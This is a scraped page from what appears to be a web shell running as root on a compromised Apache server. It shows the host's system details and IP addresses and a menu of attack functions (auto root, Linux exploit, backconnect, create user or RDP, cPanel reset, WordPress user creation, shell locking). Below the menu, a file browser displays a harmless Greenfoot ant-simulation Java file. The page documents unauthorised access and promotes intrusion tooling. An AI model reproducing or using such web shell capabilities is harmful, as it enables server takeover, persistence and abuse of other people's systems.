Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
Greenfoot /
scenarios /
java /
ants /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
Ant.class
2.62
KB
-rw-r--r--
Ant.java
3.65
KB
-rw-r--r--
AntHill.class
1.24
KB
-rw-r--r--
AntHill.java
1.45
KB
-rw-r--r--
AntWorld.class
1.46
KB
-rw-r--r--
AntWorld.java
2.29
KB
-rw-r--r--
Counter.class
1.48
KB
-rw-r--r--
Counter.java
1.04
KB
-rw-r--r--
Creature.class
2.49
KB
-rw-r--r--
Creature.java
5.2
KB
-rw-r--r--
Food.class
1.6
KB
-rw-r--r--
Food.java
1.88
KB
-rw-r--r--
Pheromone.class
1.14
KB
-rw-r--r--
Pheromone.java
1.39
KB
-rw-r--r--
README.TXT
368
B
-rw-r--r--
project.greenfoot
3.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AntWorld.java
import greenfoot.*; // (World, Actor, GreenfootImage, and Greenfoot) /** * The world where ants live. * * @author Michael Kölling * @version 1.1 */ public class AntWorld extends World { public static final int SIZE = 620; /** * Create a new world. It will be initialised with a few ant hills * and food sources */ public AntWorld() { super(SIZE, SIZE, 1); setPaintOrder(Ant.class, Pheromone.class, AntHill.class, Food.class); setup2(); } /** * Create world contents: one ant hill and food. */ public void setup1() { removeObjects(getObjects(null)); // remove all existing objects addObject(new AntHill(70), SIZE / 2, SIZE / 2); addObject(new Food(), SIZE / 2, SIZE / 2 - 260); addObject(new Food(), SIZE / 2 + 215, SIZE / 2 - 100); addObject(new Food(), SIZE / 2 + 215, SIZE / 2 + 100); addObject(new Food(), SIZE / 2, SIZE / 2 + 260); addObject(new Food(), SIZE / 2 - 215, SIZE / 2 + 100); addObject(new Food(), SIZE / 2 - 215, SIZE / 2 - 100); } /** * Create world contents: two ant hills and food. */ public void setup2() { removeObjects(getObjects(null)); // remove all existing objects addObject(new AntHill(40), 506, 356); addObject(new AntHill(40), 95, 267); addObject(new Food(), 80, 71); addObject(new Food(), 291, 56); addObject(new Food(), 516, 212); addObject(new Food(), 311, 269); addObject(new Food(), 318, 299); addObject(new Food(), 315, 331); addObject(new Food(), 141, 425); addObject(new Food(), 378, 547); addObject(new Food(), 566, 529); } /** * Create world contents: two ant hills and food. */ public void setup3() { removeObjects(getObjects(null)); // remove all existing objects addObject(new AntHill(40), 576, 134); addObject(new AntHill(40), 59, 512); addObject(new Food(), 182, 84); addObject(new Food(), 39, 308); addObject(new Food(), 249, 251); addObject(new Food(), 270, 272); addObject(new Food(), 291, 253); addObject(new Food(), 339, 342); addObject(new Food(), 593, 340); addObject(new Food(), 487, 565); } }
Close